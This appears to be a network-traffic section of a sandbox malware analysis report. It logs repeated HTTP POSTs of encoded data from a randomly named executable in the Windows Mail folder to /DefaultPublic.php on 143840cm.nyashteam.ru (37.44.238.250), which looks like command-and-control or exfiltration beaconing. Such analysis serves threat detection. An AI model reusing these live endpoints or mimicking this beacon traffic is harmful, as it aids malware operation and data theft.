Nov 25, 2024 22:38:54.395785093 CET	1048	OUT	Data Raw: 5a 59 5f 58 58 5c 55 52 59 59 54 56 57 5e 55 5b 58 59 5b 59 59 58 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZY_XX\URYYTVW^U[XY[YYXVDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Z3?:'&68_'&1"#87U('(&.&<]="<+.&\%#P-0
Nov 25, 2024 22:38:55.353879929 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:55.597100019 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49918	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:55.844305992 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:56.194946051 CET	1048	OUT	Data Raw: 5f 5f 5f 5e 58 5f 50 50 59 59 54 56 57 5b 55 58 58 5b 5b 5f 59 5d 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ___^X_PPYYTVW[UXX[[_Y]VIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV ^0#&?35(^%[!B?/;7<8$X*1"]./=2+&\%#P-$
Nov 25, 2024 22:38:57.210812092 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:57.471812010 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49922	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:57.725780010 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:58.083311081 CET	1048	OUT	Data Raw: 5f 5e 5f 5c 58 5d 50 56 59 59 54 56 57 5a 55 5a 58 58 5b 5d 59 58 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _^_\X]PVYYTVWZUZXX[]YXVGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Z'(*'$?'62"4 V/8'W?]$]+>:%3>T$?&\%#P-
Nov 25, 2024 22:38:59.045984983 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:59.293308973 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49927	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:59.788508892 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:00.145854950 CET	1048	OUT	Data Raw: 5a 5c 5a 58 5d 5d 55 51 59 59 54 56 57 5a 55 58 58 55 5b 5c 59 50 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z\ZX]]UQYYTVWZUXXU[\YPVIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Y$3&Y?0_$4Z2!]#4T/8'U(]$Y*!1,&<^?2(&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49929	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:00.565722942 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1744 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:00.911456108 CET	1744	OUT	Data Raw: 5f 5a 5a 58 58 5d 55 54 59 59 54 56 57 5f 55 52 58 5a 5b 5c 59 59 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _ZZXX]UTYYTVW_URXZ[\YYVHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#' :^(:]&%$Y26;(<++ X12Z953)1<.&\%#P-
Nov 25, 2024 22:39:01.836116076 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:02.072416067 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 58 37 3d 2f 56 24 5b 2a 1c 2a 12 01 5a 26 28 0b 5f 27 3d 09 18 35 0a 21 5b 24 2f 20 0a 22 2f 2a 5f 3c 07 31 57 26 2e 00 59 24 31 2e 51 01 13 21 06 21 55 3d 1f 2f 23 0e 06 32 06 20 08 26 1f 39 04 28 10 33 19 21 23 22 01 3d 22 3a 03 2d 3c 30 59 2a 2b 28 06 2c 0e 20 0b 23 3f 2e 5f 08 13 23 54 3d 06 23 1f 24 0e 3f 12 25 02 34 0d 23 3a 08 51 30 0d 25 1f 35 3c 27 5d 2b 2d 33 04 23 2e 35 0c 27 2e 32 5b 27 1f 20 08 27 03 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %X7=/V$[*Z&(_'=5![$/ "/_<1W&.Y$1.Q!!U=/#2 &9(3!#"=":-<0Y*+(, #?._#T=#$?%4#:Q0%5<']+-3#.5'.2[' '"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49930	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:00.732181072 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:01.083334923 CET	1048	OUT	Data Raw: 5a 5f 5a 5e 58 5b 50 57 59 59 54 56 57 51 55 5a 58 5c 5b 5e 59 5e 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z_Z^X[PWYYTVWQUZX\[^Y^VAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV 332Z<:(]&%/&65/8V?]<Z+9-8\=$*.&\%#P-
Nov 25, 2024 22:39:02.002795935 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:02.236143112 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49935	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:02.482335091 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1044 Expect: 100-continue
Nov 25, 2024 22:39:02.833446980 CET	1044	OUT	Data Raw: 5f 58 5f 52 5d 5d 55 56 59 59 54 56 57 58 55 53 58 5a 5b 5a 59 5e 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _X_R]]UVYYTVWXUSXZ[ZY^VFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#001<9 ^&%&&)X5$+83+(;*">],%0]=27_<>&\%#P-
Nov 25, 2024 22:39:03.753012896 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:03.988020897 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49940	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:04.233839035 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:39:04.583486080 CET	1048	OUT	Data Raw: 5a 55 5f 53 5d 5d 50 56 59 59 54 56 57 51 55 5a 58 59 5b 5c 59 59 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZU_S]]PVYYTVWQUZXY[\YYVIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV 0 &<9$352&5X!4'/4<80("995<*!?<&\%#P-
Nov 25, 2024 22:39:05.555175066 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:05.797131062 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49945	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:06.064502001 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:06.411465883 CET	1048	OUT	Data Raw: 5a 54 5a 5b 5d 5c 55 56 59 59 54 56 57 5b 55 5d 58 54 5b 5e 59 5e 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZTZ[]\UVYYTVW[U]XT[^Y^VGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#' %+:'$&826-]!<,8#?3">.603_?>&\%#P-$

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49949	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:07.205003977 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1744 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:07.552138090 CET	1744	OUT	Data Raw: 5a 58 5f 5c 58 5d 55 55 59 59 54 56 57 5a 55 53 58 5f 5b 52 59 5e 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZX_\X]UUYYTVWZUSX_[RY^VHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV $&^=8^'+&5Y"W,(V(;+2&,5,)(&\%#P-
Nov 25, 2024 22:39:08.520864010 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:08.765124083 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 59 23 2d 3c 0e 33 3e 29 0f 3d 05 37 5f 26 38 25 1d 24 5b 30 41 35 0a 39 13 27 02 23 54 20 02 0c 59 2b 2e 2e 0d 24 2d 29 01 24 21 2e 51 01 13 22 12 35 20 3d 1c 2d 23 24 00 32 28 28 07 26 32 3a 5c 3f 00 06 0f 23 33 3e 05 28 0c 3e 05 38 3c 24 58 29 2b 24 02 38 0e 33 1b 21 3f 2e 5f 08 13 23 56 2a 11 3c 0f 25 34 23 59 26 3c 2b 57 36 3a 39 0a 33 33 0c 09 36 2c 27 1a 2b 2d 24 10 22 3d 3e 52 27 2d 31 05 30 57 2f 55 33 03 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %Y#-<3>)=7_&8%$[0A59'#T Y+..$-)$!.Q"5 =-#$2((&2:\?#3>(>8<$X)+$83!?._#V*<%4#Y&<+W6:9336,'+-$"=>R'-10W/U3"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49950	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:07.327022076 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:07.677093029 CET	1048	OUT	Data Raw: 5f 59 5a 5f 58 58 55 54 59 59 54 56 57 5a 55 52 58 54 5b 5d 59 51 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _YZ_XXUTYYTVWZURXT[]YQV@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#'.Z<:4$%Y%C-X5B8;+?U)(8[(2.%+*7_?.&\%#P-
Nov 25, 2024 22:39:08.643007040 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:08.889187098 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49955	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:09.126729012 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:39:09.474039078 CET	1048	OUT	Data Raw: 5a 5a 5f 5a 58 5b 50 57 59 59 54 56 57 5b 55 53 58 5c 5b 5d 59 5e 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZZ_ZX[PWYYTVW[USX\[]Y^VAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#$#2Z<(&&+%%Z5 T/;$(]<[?*96,\>!7[(&\%#P-$
Nov 25, 2024 22:39:10.473658085 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:10.717084885 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49960	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:11.008160114 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:11.364787102 CET	1048	OUT	Data Raw: 5a 55 5f 5b 58 5a 55 5b 59 59 54 56 57 5f 55 5d 58 59 5b 53 59 58 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZU_[XZU[YYTVW_U]XY[SYXVAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Y33?;05(X2%%5U.8((;?X-8='<>&\%#P-
Nov 25, 2024 22:39:12.299175024 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:12.536063910 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49965	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:12.785491943 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:13.134188890 CET	1048	OUT	Data Raw: 5a 58 5f 5e 58 5c 50 57 59 59 54 56 57 50 55 5d 58 5e 5b 58 59 51 56 47 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZX_^X\PWYYTVWPU]X^[XYQVGZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Y'3&(+'&?1."0W/8#)8'*"&].6/)T?_(&\%#P-

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49968	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:13.892232895 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:14.240366936 CET	1764	OUT	Data Raw: 5f 58 5f 52 58 5c 50 52 59 59 54 56 57 5f 55 58 58 59 5b 5b 59 50 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _X_RX\PRYYTVW_UXXY[[YPVBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#'02(:Z07'5-5<R,8(+]<+T>-')1?_(&\%#P-
Nov 25, 2024 22:39:15.211139917 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:39:15.453197956 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:39:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 25 5a 34 2e 23 50 27 2d 21 0e 29 3f 28 07 24 3b 21 5b 33 04 3f 1b 36 37 39 5f 24 3f 20 0d 37 2c 25 00 3c 2d 32 0f 24 58 21 02 27 0b 2e 51 01 13 21 00 20 23 0c 0f 2c 0d 0e 07 25 06 0d 19 25 0f 3e 15 2b 07 2b 56 23 30 31 5b 3f 32 03 5a 2f 3f 3c 13 2b 3b 0d 12 2f 20 3f 19 21 3f 2e 5f 08 13 23 10 3e 01 2c 0f 24 09 30 07 25 12 3c 0a 21 29 3a 1b 24 20 22 0e 23 2c 3c 04 3f 3d 38 5b 22 3d 29 0a 27 03 26 5f 33 0f 05 50 27 29 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: %Z4.#P'-!)?($;![3?679_$? 7,%<-2$X!'.Q! #,%%>++V#01[?2Z/?<+;/ ?!?._#>,$0%<!):$ "#,<?=8["=)'&_3P')"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49969	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:39:14.019562006 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:39:14.365680933 CET	1048	OUT	Data Raw: 5a 54 5a 5c 58 5c 55 5a 59 59 54 56 57 51 55 5c 58 5a 5b 5a 59 5e 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZTZ\X\UZYYTVWQU\XZ[ZY^VDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV $1(8'%7&5[!4 V, ?];(&[9 =1((&\%#P-
